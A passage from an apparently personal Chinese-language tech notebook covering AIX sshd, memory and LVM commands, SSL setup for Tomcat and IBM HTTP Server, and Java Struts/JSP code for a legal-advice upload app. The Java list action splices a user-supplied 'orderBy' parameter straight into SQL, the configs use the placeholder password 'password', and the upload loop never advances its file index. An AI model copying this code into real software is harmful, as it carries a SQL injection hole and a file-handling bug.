    HostKey /tmp/xx/ssh/etc/ssh_host_dsa_key
    HostKey /tmp/xx/ssh/etc/ssh_host_ecdsa_key
  6. 启动sshd,startsrc -g ssh

参考

http://www.ibm.com/developerworks/forums/thread.jspa?threadID=249556
http://daning.iteye.com/blog/166186
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/sshd-daemon-does-not-start-during-boot-1524597
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/how-to-restart-ssh-in-aix-1551784
http://www.unixguide.net/sun/ssh_installation.shtml

aix memory tuning

真实内存数量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
lsattr -El sys0 -a realmem(以KB为单位) 
bootinfo -r(以KB为单位)

prtconf -m(以MB为单位)
bootinfo -y ->cpu
bootinfo -K ->kernel

svmon -G 第一行memory size(需要X4KB)
vmstat -v/-s 第一行memory page(需要X4KB)
topas

lsps -a/-s
vmo -L/-a

prtconf -v/lscfg
lsdev -Cc tape/processor/adapter/disk
prtconf = lsconf

ps -efa 显示进程
ps aux 显示进程内存情况

file pages, minperm, maxperm, numperm关于文件页面占用内存,跟non-computational内存有关(topas)

client pages,maxclient,numclient关于nfs被client连接使用内存有关

数据库服务器由于是计算密集型,所以minperm, maxperm percentage可以设置小一些,而文件服务器可以设置大一些的。

https的一些配置

Misc

tunein
sky.fm
browser import cert
ssl in archlinux
ssl in tomcat

Openssl

1
2
3
4
5
6
openssl test https
openssl s_client -showcerts -connect 10.13.139.102:443 -state -debug
openssl s_client -connect 10.13.139.102:465

OpenSSL Command-Line HOWTO
http://www.madboa.com/geek/openssl/(中文版http://www.linuxfly.org/post/185/1/4/)

Tomcat

1
2
3
4
5
keytool -genkey -alias developerstation -keyalg RSA -keystore developerstation.keystore -keysize 2048

<Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true"
maxThreads="150" scheme="https" secure="true"
clientAuth="false" sslProtocol="TLS" keystoreFile="C:\Software\Tomcat\conf\developerstation.keystore" keystorePass="password"/>

tomcat7中配置ssl的详细步骤(双向认证)

tomcat7中配置ssl的详细步骤(单向认证)

IHS

例子

1
2
3
4
5
6
7
8
9
Listen 10.13.139.102:443
<VirtualHost 10.13.139.102:443>
SSLEnable
SSLClientAuth none
Keyfile C:\temp\ssl\key.kdb
SSLV2Timeout 100
SSLV3Timeout 1000
</VirtualHost>
SSLDisable

Reference:

Guide to properly setting up SSL within the IBM HTTP Server
在IHS上配置SSL
Configuring the IBM HTTP Server for SSL
SSL Directives
Debugging SSL communications

IKEYMAN生成证书

例子

1
2
3
4
5
6
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -keydb -create -db xx.kdb -pw password -type cms -expire 60 -stash
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -create -db xx.kdb -pw password -size 1024 -dn "CN=weblinux.raleigh.ibm.com,O=IBM,OU=IBM HTTP Server,L=RTP,ST=NC,C=US" -label mylabel -default_cert yes
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -list -db xx.kdb -pw password
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -details -db xx.kdb -pw password -label mylabel
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -extract -db xx.kdb -pw password -label mylabel -format ascii -target forest-certficate
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -export -db xx.kdb -pw password -label mylabel -target forest.p12 -target_pw password -target_type pkcs12 -encryption strong

Using iKeyman to create a key database file
Using the Key Management Utility
httpservers doc
ikeycmd参考

在AIX上空闲卷上重建文件系统

在卷组vg01上重建具有5个物理分区的逻辑卷,卷名为mytest,类型jfs2(一个物理分区大小为128或512M,具体用命令lsvg vg01查看PP Size)

mklv -y mytest -t jfs2 vg01 5

在逻辑卷mytest上重建可读写的jfs2文件系统,并新建挂载文件夹/mounttest

crfs -v jfs2 -d mytest -p rw -m /mounttest

查看逻辑卷:

lslv mytest
lsvg -l vg01

查看/etc/filesystems文件,看到

1
2
3
4
5
6
7
/mounttest:
dev = /dev/mytest
vfs = jfs2
log = /dev/loglv04
mount = false
options = rw
account = false

此时mytest的LV STATE为closed/syncd,直到将其挂载到/mounttest才能使用。

mount /dev/mytest /mounttest

用lsvg -l vg01看LV STATE转为open/syncd

查看文件系统:df -g,看到/mounttest已挂载。

卸载文件系统:

1
2
3
umount /mounttest (LV STATE转为closed/syncd)
rmfs /mounttest
rmlv loglv04

有以下这些概念需要注意:

1
2
3
4
5
6
7
8
vg_name
pv_name
lv_name
mountpoint
vg01
hdisk0
mytest
mountest

找出一个物理卷可用到空间:lspv -p hdisk1,找到state显示free的部分。

了解以下命令有帮助:

1
2
3
4
5
6
7
8
lscfg
prtconf
lsdev -Cc hdisk
lsattr -El hdisk0
lsvg
lspv
lslv
lsfs

Reference:

http://study.chyangwa.com/IT/AIX/aixcmds1/crfs.htm
http://www.tek-tips.com/faqs.cfm?fid=3180
http://www.ibm.com/developerworks/aix/library/au-dutta_cmds.html
http://www.cnblogs.com/Mainz/articles/1027105.html
http://blog.csdn.net/tglg/article/details/4557948

Sorting & Cell Merge, commons-upload

LegalAdviceAction.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
import vo.CaseLegalAdvice;
import vo.Chapter;
import vo.Enactment;
import vo.EnactmentView;
import vo.LegalAdviceUpload;
import vo.OffenseQuote;

import java.io.File;
import java.io.FileInputStream;
import java.io.Serializable;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.Statement;
import java.sql.Timestamp;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Locale;
import java.util.ResourceBundle;
import java.util.StringTokenizer;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.oro.text.regex.MatchResult;
import org.apache.oro.text.regex.Pattern;
import org.apache.oro.text.regex.PatternCompiler;
import org.apache.oro.text.regex.PatternMatcher;
import org.apache.oro.text.regex.Perl5Compiler;
import org.apache.oro.text.regex.Perl5Matcher;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
import org.apache.struts.actions.DispatchAction;

import xx.utils.DbManager;

public class LegalAdviceAction extends DispatchAction {
final ResourceBundle uploadSetting = ResourceBundle
.getBundle("xx.properties.uploadSettings");

public ActionForward save(ActionMapping mapping, ActionForm form,
HttpServletRequest request, HttpServletResponse response)
throws Exception {

final SimpleDateFormat sf = new SimpleDateFormat("dd/MM/yyyy",
Locale.ENGLISH);

final String savePath = uploadSetting
.getString("upload.dir.prosecutions");

String fileNo = "";
String subject = "";
String legalAdviceStatus = "";
String legalAdviceRemarks = "";
String legalAdviceDate = "";
String authRefInd = "";
String authRef = "";
String defendant = "";
String defendantEmployer = "";
String defendantEmployee = "";
String ordinance = "";
String keepFileNos = "";
List fileContent = new ArrayList();

List keepFileNosList = new ArrayList();
List uploadFileList = new ArrayList();
String reqCode = "";
String caseNo = "";

final Timestamp now = new Timestamp(new java.util.Date().getTime());
String login_id = (String) request.getSession()
.getAttribute("login_id");

final DiskFileUpload upload = new DiskFileUpload();
final List list = upload.parseRequest(request);
final Iterator it = list.iterator();
while (it.hasNext()) {
final FileItem item = (FileItem) it.next();
if (item.isFormField()) {
if (getParamter(item, "subject")) {
subject = item.getString();
} else if (getParamter(item, "ordinance")) {
ordinance = item.getString();
} else if (getParamter(item, "legalAdviceDate")) {
legalAdviceDate = item.getString();
} else if (getParamter(item, "legalAdviceStatus")) {
if ("a".equals(item.getString())) {
legalAdviceStatus = "Accepted";
} else if ("na".equals(item.getString())) {
legalAdviceStatus = "Not Accepted";
} else {
legalAdviceStatus = "Not Mentioned";
}
} else if (getParamter(item, "legalAdviceRemarks")) {
legalAdviceRemarks = item.getString();
} else if (getParamter(item, "authRefInd")) {
authRefInd = item.getString();
} else if (getParamter(item, "defendantEmployer")) {
defendantEmployer = item.getString();
} else if (getParamter(item, "defendantEmployee")) {
defendantEmployee = item.getString();
} else if (getParamter(item, "fileNo")) {
fileNo = item.getString();
} else if (getParamter(item, "authRef")) {
authRef = item.getString();
} else if (getParamter(item, "reqCode")) {
reqCode = item.getString();
} else if (getParamter(item, "caseNo")) {
caseNo = item.getString();
} else if (getParamter(item, "keepFileNos")) {
keepFileNos = item.getString();
}
} else {
String fileName = item.getName();
if (fileName != null && fileName.length() > 0) {
if (fileName.indexOf("\\") != -1) {
PatternCompiler compiler = new Perl5Compiler();
PatternMatcher matcher = new Perl5Matcher();
Pattern pattern = compiler.compile("^.+\\\\(.+)$");
if (matcher.matches(fileName, pattern)) {
MatchResult ms = matcher.getMatch();
System.out
.println("fileName full path " + fileName);
fileName = ms.group(1);
System.out.println("fileName " + fileName);
}
}

uploadFileList.add(fileName);
fileContent.add(item);
}
}
}

if (defendantEmployer.length() > 0 && defendantEmployee.length() > 0) {
defendant = defendantEmployer + "/" + defendantEmployee;
} else if (defendantEmployer.length() > 0) {
defendant = defendantEmployer;
} else {
defendant = defendantEmployee;
}

System.out.println("caseNo " + caseNo + " , subject " + subject
+ " ,legalAdviceDate " + legalAdviceDate + " , ordinance "
+ ordinance + " , keepFileNos " + keepFileNos);

final Connection conn = DbManager.getConnection();

if ("edit".equals(reqCode)) {
System.out.println("edit legail advice");
String sql = "update case_legal_advice set offense_code = ?, file_no = ?, subject = ?, "
+ "legal_advice_date = ?, legal_advice_status = ?, legal_advice_remarks = ?, "
+ "defendant = ?, auth_ref_ind = ?, auth_ref = ?,"
+ "last_update = ?, update_by = ? where case_seq_no = ?";
PreparedStatement ps = conn.prepareStatement(sql);

ps.setString(1, ordinance);
ps.setString(2, fileNo);
ps.setString(3, subject);
ps.setDate(4, new Date(sf.parse(legalAdviceDate).getTime()));
ps.setString(5, legalAdviceStatus);
ps.setString(6, legalAdviceRemarks);
ps.setString(7, defendant);
ps.setString(8, authRefInd);
ps.setString(9, authRef);

ps.setTimestamp(10, now);
ps.setString(11, login_id);
ps.setInt(12, Integer.parseInt(caseNo));

ps.executeUpdate();
ps.close();

StringTokenizer st = new StringTokenizer(keepFileNos, "|");
while (st.hasMoreTokens()) {
String token = st.nextToken();
System.out.println("keep file No. " + token);
keepFileNosList.add(token);
}

String fileSql = "select upload_seq_no, file_name from legal_advice_upload where case_seq_no = ? order by upload_seq_no";
System.out.println("fileSql " + fileSql);
ps = conn.prepareStatement(fileSql);
ps.setString(1, caseNo);
ResultSet rs = ps.executeQuery();

List toDeleteFilesNo = new ArrayList();
while (rs.next()) {
String upload_seq_no = rs.getString("upload_seq_no");
String file = rs.getString("file_name");

if (!keepFileNosList.contains(upload_seq_no)) {
toDeleteFilesNo.add(upload_seq_no);
if (new File(savePath + file).delete()) {
System.out.println("file " + file + " is deleted.");
}
}
}
rs.close();
ps.close();

Iterator delItr = toDeleteFilesNo.iterator();
String deleteFileSql = "delete legal_advice_upload where upload_seq_no = ?";
ps = conn.prepareStatement(deleteFileSql);
while (delItr.hasNext()) {
String uploadNo = (String) delItr.next();
ps.setString(1, uploadNo);
ps.executeUpdate();
}
ps.close();

} else {
System.out.println("add legail advice.");
int seq = 0;
Statement stmt = conn.createStatement();
ResultSet rs = stmt
.executeQuery("select case_legal_advice_SQ.nextval as seq from dual");

while (rs.next()) {
seq = rs.getInt("seq");
}
rs.close();
stmt.close();

System.out.println("case_legal_advice_SQ " + seq);
caseNo = String.valueOf(seq);
String sql = "insert into case_legal_advice(case_seq_no, offense_code, file_no, subject, legal_advice_date, "
+ "legal_advice_status, legal_advice_remarks, defendant, auth_ref_ind, auth_ref, "
+ "last_update, update_by) values(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)";
final PreparedStatement ps = conn.prepareStatement(sql);

ps.setInt(1, seq);
ps.setString(2, ordinance);
ps.setString(3, fileNo);
ps.setString(4, subject);
ps.setDate(5, new Date(sf.parse(legalAdviceDate).getTime()));
ps.setString(6, legalAdviceStatus);
ps.setString(7, legalAdviceRemarks);
ps.setString(8, defendant);
ps.setString(9, authRefInd);
ps.setString(10, authRef);

ps.setTimestamp(11, now);
ps.setString(12, login_id);

ps.executeUpdate();
ps.close();
}

Iterator itr = uploadFileList.iterator();
int i = 0;
while (itr.hasNext()) {
String fileName = (String) itr.next();
int uploadReq = 0;
Statement stmt2 = conn.createStatement();
ResultSet rs2 = stmt2
.executeQuery("select legal_advice_upload_SQ.nextval as seq from dual");

while (rs2.next()) {
uploadReq = rs2.getInt("seq");
}
rs2.close();
stmt2.close();
System.out.println("legal_advice_upload_SQ " + uploadReq);

String sql2 = "insert into legal_advice_upload (upload_seq_no, case_seq_no, file_name, last_update, update_by) values(?, ?, ?, ?, ?)";
PreparedStatement ps2 = conn.prepareStatement(sql2);
ps2.setInt(1, uploadReq);
ps2.setInt(2, Integer.parseInt(caseNo));
ps2.setString(3, fileName);
ps2.setTimestamp(4, now);
ps2.setString(5, login_id);
ps2.executeUpdate();
ps2.close();

FileItem item = (FileItem) fileContent.get(i);

System.out.println("save file " + fileName + " => " + savePath
+ String.valueOf(uploadReq));
item.write(new File(savePath + String.valueOf(uploadReq)));
}

return mapping.findForward("redirectList");
}

private boolean getParamter(FileItem item, String paramName) {
if (item.getString() != null && item.getFieldName().equals(paramName)) {
return true;
}
return false;
}

public ActionForward list(ActionMapping mapping, ActionForm form,
HttpServletRequest request, HttpServletResponse response)
throws Exception {
String orderBy = request.getParameter("orderBy");
System.out.println("orderBy " + orderBy);

Object lastFieldSort = request.getSession().getAttribute(
"lastFieldSort");
FieldSort fieldSort = null;

if (lastFieldSort == null) {
fieldSort = new FieldSort();
fieldSort.setSortBy(orderBy);
fieldSort.setAsc(Boolean.TRUE);
} else {
fieldSort = (FieldSort) lastFieldSort;

if (fieldSort.getSortBy() != null
&& fieldSort.getSortBy().equals(orderBy)) {
if (fieldSort.getAsc().equals(Boolean.TRUE)) {
fieldSort.setAsc(Boolean.FALSE);
} else {
fieldSort.setAsc(Boolean.TRUE);
}
} else {
fieldSort.setSortBy(orderBy);
fieldSort.setAsc(Boolean.TRUE);
}
}

final Connection conn = DbManager.getConnection();

Statement stmt = conn.createStatement();
String sql = "select e.enact_Chap, e.title, c.chapter, o.sect_reg, o.description, cla.case_seq_no, cla.file_no, cla.subject, "
+ "cla.legal_advice_date, cla.legal_advice_status, cla.defendant, cla.auth_ref_ind, cla.auth_ref, u.upload_seq_no, u.file_name "
+ "from Enactment e, Chapter c, offense_quote o, case_legal_advice cla, legal_advice_upload u "
+ "where e.enact_chap = c.enact_chap and c.Chapter = o.Chapter and o.offense_code = cla.offense_code(+) and "
+ "cla.case_seq_no = u.case_seq_no(+)";
if (orderBy != null && orderBy.length() > 0) {
sql += " order by "
+ fieldSort.getSortBy()
+ (fieldSort.getAsc().equals(Boolean.TRUE) ? " asc"
: " desc") + ", cla.file_no";
} else {
sql += " order by c.Chapter, cla.file_no";
orderBy = "c.chapter";
fieldSort = new FieldSort();
fieldSort.setSortBy(orderBy);
fieldSort.setAsc(Boolean.TRUE);
}

request.getSession().setAttribute("lastFieldSort", fieldSort);

System.out.println("sql = " + sql);
ResultSet rs = stmt.executeQuery(sql);
List list = new ArrayList();
while (rs.next()) {
EnactmentView view = new EnactmentView();
Enactment enactment = new Enactment();
Chapter chapter = new Chapter();

...
String enactChap = rs.getString("enact_Chap");
String title = rs.getString("title");
String chapterValue = rs.getString("chapter");
...

list.add(view);
}
rs.close();
stmt.close();

request.setAttribute("list", list);
request.setAttribute("sortBy", fieldSort.getSortBy());
if (fieldSort.getAsc().equals(Boolean.FALSE)) {
request.setAttribute("order", "down");
} else {
request.setAttribute("order", "up");
}

String savePath = uploadSetting.getString("upload.dir.prosecutions");
request.setAttribute("savePath", savePath);

return mapping.findForward("list");
}

public ActionForward download(ActionMapping mapping, ActionForm form,
HttpServletRequest request, HttpServletResponse response)
throws Exception {
String id = request.getParameter("id");
String fileName = "";

final Connection conn = DbManager.getConnection();
String sql = "select file_name from legal_advice_upload where upload_seq_no = ?";
PreparedStatement ps = conn.prepareStatement(sql);
ps.setString(1, id);
ResultSet rs = ps.executeQuery();

if (rs.next()) {
fileName = rs.getString("file_name");
}
rs.close();
ps.close();

System.out.println("download file : " + fileName);
String savePath = uploadSetting.getString("upload.dir.prosecutions");
FileInputStream in = new FileInputStream(savePath + "/" + id);
byte[] buffer = new byte[8092];
int i = 0;
response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=\""
+ new String(fileName.getBytes("UTF-8"), "ISO_8859_1") + "\"");

while ((i = in.read(buffer)) != -1) {
response.getOutputStream().write(buffer, 0, i);
}

response.getOutputStream().flush();
return null;
}
}

class FieldSort implements Serializable {
private String sortBy;
private Boolean asc;

public String getSortBy() {
return sortBy;
}

public void setSortBy(String sortBy) {
this.sortBy = sortBy;
}

public Boolean getAsc() {
return asc;
}

public void setAsc(Boolean asc) {
this.asc = asc;
}
}

list.jsp (sort, cell merge)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>

<script src="js/jquery.js" type="text/javascript"></script>
<script type="text/javascript">
function init(){}

function _w_table_rowspan(_w_table_id,_w_table_colnum){
_w_table_firsttd = "";
_w_table_currenttd = "";
_w_table_SpanNum = 0;
_w_table_Obj = $(_w_table_id + " tr td:nth-child(" + _w_table_colnum + ")");
_w_table_Obj.each(function(i){
if(i==0){
_w_table_firsttd = $(this);
_w_table_SpanNum = 1;
}else{
_w_table_currenttd = $(this);
if(_w_table_firsttd.text()==_w_table_currenttd.text()){
var firstSection = _w_table_firsttd.parent().find('td:eq(4)').text();
var currentSection = _w_table_currenttd.parent().find('td:eq(4)').text();
if(firstSection == currentSection){
_w_table_SpanNum++;
_w_table_currenttd.hide(); //remove();
_w_table_firsttd.attr("rowSpan",_w_table_SpanNum);
}
}else{
_w_table_firsttd = $(this);
_w_table_SpanNum = 1;
}
}
});
}

var sorting = function(title, order){
var position = 0;
var header = '';
$("#result thead th").each(function(index, dom){
if(title == $(dom).attr('id')){
position = index;
header = $(dom).text();
}
});

$("#result thead th:eq(" + position + ")").html("<font color='yellow'>" + header + "</font>&nbsp;<img src='images/arrow_" + order + ".gif'/>");
}

$(function(){
$("#result thead th").each(function(){
$(this).css({"cursor":"pointer"});
$(this).click(function(){
var id = $(this).attr('id');
$(":hidden[name='orderBy']").val(id);

var form = $("form[name='form1']");
form.submit();
});
});

var sortBy = '<bean:write name="sortBy"/>';
var order = '<bean:write name="order"/>';

sorting(sortBy, order);

for(var i = 1; i < 10; i++){
_w_table_rowspan("#result", i);
}
});

</script>

<div id="content_layer" style="z-index:1">
<form name="form1" method="post" action="legalAdvice.do?reqCode=list" class="form">
<p class="form_text_h" align="right"><font size="1">AM0101001</font></p>
<p class="form_text_h">View Legal Advice:</p>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table id="result" border="1">
<thead>
<tr>
<th class="formheader" id="c.chapter">Chapter</th>
<th class="formheader" id="o.sect_reg">Section/Regulation</th>
<th class="formheader" id="o.description">Description of Offence</th>
<th class="formheader" id="cla.file_no">File No.</th>
<th class="formheader" id="cla.subject">Subject</th>
<th class="formheader" id="cla.legal_advice_date">Legal Advice Date</th>
<th class="formheader" id="cla.legal_advice_status">Legal Advice</th>
<th class="formheader" id="cla.defendant">Defendant</th>
<th class="formheader" id="cla.auth_ref_ind">Authority Reference</th>
<th class="formheader" id="u.file_name">File Name</th>
</tr>
</thead>
<tbody>
<logic:iterate id="view" name="list" type="vo.EnactmentView" scope="request">
<bean:define id="enactment" name="view" property="enactment" type="vo.Enactment"/>
<bean:define id="chapter" name="view" property="chapter" type="vo.Chapter"/>
<bean:define id="offenseQuote" name="view" property="offenseQuote" type="vo.OffenseQuote"/>
<bean:define id="legalAdviceUpload" name="view" property="legalAdviceUpload" type="vo.LegalAdviceUpload"/>
<bean:define id="caseLegalAdvice" name="view" property="caseLegalAdvice" type="vo.CaseLegalAdvice"/>

<tr>
<td nowrap="nowrap">Cap.<bean:write name="enactment" property="enactChap"/></td>
<td><bean:write name="offenseQuote" property="sectReg"/></td>
<td><bean:write name="offenseQuote" property="description"/></td>
<td><bean:write name="caseLegalAdvice" property="fileNo"/></td>
<td>
<logic:equal name="caseLegalAdvice" property="subject" value="Nil">
<bean:write name="caseLegalAdvice" property="subject"/>
</logic:equal>
<logic:notEqual name="caseLegalAdvice" property="subject" value="Nil">
<a href='legalAdvice.do?reqCode=view&caseSeqNo=<bean:write name="caseLegalAdvice" property="caseSeqNo"/>'><bean:write name="caseLegalAdvice" property="subject"/></a>
</logic:notEqual>
</td>
<td><bean:write name="caseLegalAdvice" property="legalAdviceDateFormat"/></td>
<td><bean:write name="caseLegalAdvice" property="legalAdviceStatus"/></td>
<td><bean:write name="caseLegalAdvice" property="defendant"/></td>
<td><bean:write name="caseLegalAdvice" property="authRefInd"/></td>
<td><a target='_blank' href='legalAdvice.do?reqCode=download&id=<bean:write name="legalAdviceUpload" property="uploadSeqNo"/>'><bean:write name="legalAdviceUpload" property="fileName"/></a></td>
</tr>
</logic:iterate>
</tbody>
</table>
</td>
</tr>
</table>
<input type="hidden" name="orderBy" value=""/>
<button onclick="addProsecution()">Legal Advice Update</button>
</form>

add.jsp (leave year checking with JS, form upload)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
<%@ page import="vo.*, java.text.SimpleDateFormat"%>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<bean:define id="caseLegalAdvice" name="caseLegalAdvice" scope="request" type="vo.CaseLegalAdvice"/>
<bean:define id="reqCode" name="reqCode" scope="request" type="java.lang.String"/>

<script src="js/jquery.js" type="text/javascript"></script>
<script type="text/javascript">
function init(){}

function calDays(year,month){
var days=0;
switch(month){
case 1: case 3: case 5: case 7: case 8: case 10: case 12: days=31;break;
case 4: case 6: case 9: case 11: days=30;break;
case 2: if(isLeapYear(year)) days=29;
else days=28;
break;
}
return days;
}

function isLeapYear(year){
if((year %4==0 && year %100!=0) || (year %400==0)) return true;
else return false;
}

function checkFiles(){
var exist = false;
$("input[type='file']").each(function(){
if($(this).val() != ''){
exist = true;
}
});

if(!exist){
alert('No file selected.');
return false;
}
return true;
}

$(function(){
$("form[name='form1']").submit(function(){
var regexp = /^(\d{2})\/(\d{2})\/(\d{4})$/;

if($("input[name='fileNo']").val() == ''){
alert('File No. is empty.');
return false;
}


if($("input[name='subject']").val() == ''){
alert('Subject is empty.');
return false;
}

var legalAdviceDate = $("input[name='legalAdviceDate']").val();
if(legalAdviceDate == ''){
alert('Legal Advice Date is empty.');
return false;
}

if(!regexp.test(legalAdviceDate)){
alert('Legal Advice Date is invalid.');
return false;
}else{
var match = regexp.exec(legalAdviceDate);
var year = parseInt(match[3], 10);
var month = parseInt(match[2], 10);
var day = parseInt(match[1], 10);
var maxDay = calDays(year, month);
if(day > maxDay){
alert('Legal Advice Date is invalid.');
return false;
}
}

if($("#ordinance").val()==null){
alert('Related Ordinance is empty.');
return false;
}

var checked = false;
$(":radio[name='legalAdviceStatus']").each(function(){
if($(this).attr('checked')){
checked = true;
}
});

if(!checked){
alert('Legal Advice is empty.');
return false;
}

checked = false;
$(":checkbox[name^='defendant']").each(function(){
if($(this).attr('checked')){
checked = true;
}
});

if(!checked){
alert('Defendant is empty.');
return false;
}

checked = false;
$(":radio[name='authRefInd']").each(function(){
if($(this).attr('checked')){
checked = true;
}
});

if(!checked){
alert('Any Authority Reference Mentioned is empty.');
return false;
}


if('<%=reqCode%>' == 'edit'){
if($(".deleteFile").length < 1){
if(!checkFiles()){
return false;
}
}
}else{
if(!checkFiles()){
return false;
}
}

var filesNo = '';
$(".uploadFiles").each(function(){
filesNo += $(this).find('span').text() + "|" ;
});

$(":hidden[name='keepFileNos']").val(filesNo);
return true;
});

$(".deleteFile").click(function(){
$(this).parent().remove();
});

var fileName = 3;
$("#addFile").click(function(){
$("#files").append("<input type='file' accept='application/pdf' name='file" + fileName + "' size='40' /><br/>");
fileName++;
});

});
</script>

<div id="content_layer" style="z-index:1">
<form name="form1" method="post" action="legalAdvice.do?reqCode=save" class="form" enctype="multipart/form-data">
<p class="form_text_h" align="right"><font size="1">XXXX</font></p>
<p class="form_text_h">Legal Advice Update:</p>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="formheader" width="560">Legal Advice:</td>
</tr>
<tr>
<td valign="top" width="560">
<table width="100%" border="0" cellspacing="2" cellpadding="0">
<tr>
<td width="35%"><b>File No.:<span style="color:red">*</span></b></td>
<td width="65%">
<input type="text" name="fileNo" size="40" value="" maxlength="50" value='<bean:write name="caseLegalAdvice" property="fileNo"/>'/>
</td>
</tr>
<tr>
<td width="35%"><b>Subject:<span style="color:red">*</span></b></td>
<td width="65%">
<input type="text" name="subject" size="40" value='<bean:write name="caseLegalAdvice" property="subject"/>' maxlength="50" />
</td>
</tr>

<tr>
<td width="35%"><b>Legal Advice Date(dd/mm/yyyy):<span style="color:red">*</span></b></td>
<td width="65%">
<input type="text" name="legalAdviceDate" size="40" value='<bean:write name="caseLegalAdvice" property="legalAdviceDate" format="dd/MM/yyyy"/>' maxlength="40" >
</td>
</tr>
<tr>
<td width="35%"><b>Related Ordinance:<span style="color:red">*</span></b></td>
<td width="65%">
<select id="ordinance" name="ordinance" size="7" style="max-width:260px;width:260px">
<%
List ordinance = (List)request.getAttribute("ordinance");
String offenseCode = caseLegalAdvice.getOffenseCode();
Iterator it = ordinance.iterator();
while(it.hasNext()){
List items = (List)it.next();
if(offenseCode != null && offenseCode.equals(items.get(0))){
out.print("<option selected='selected' title='Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "' value='" + items.get(0) + "'>Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "</option>");
}else{
out.print("<option title='Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "' value='" + items.get(0) + "'>Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "</option>");
}
}
%>
</select>
</td>
</tr>
<tr>
<td><b>Legal Advice:<span style="color:red">*</span></b></td>
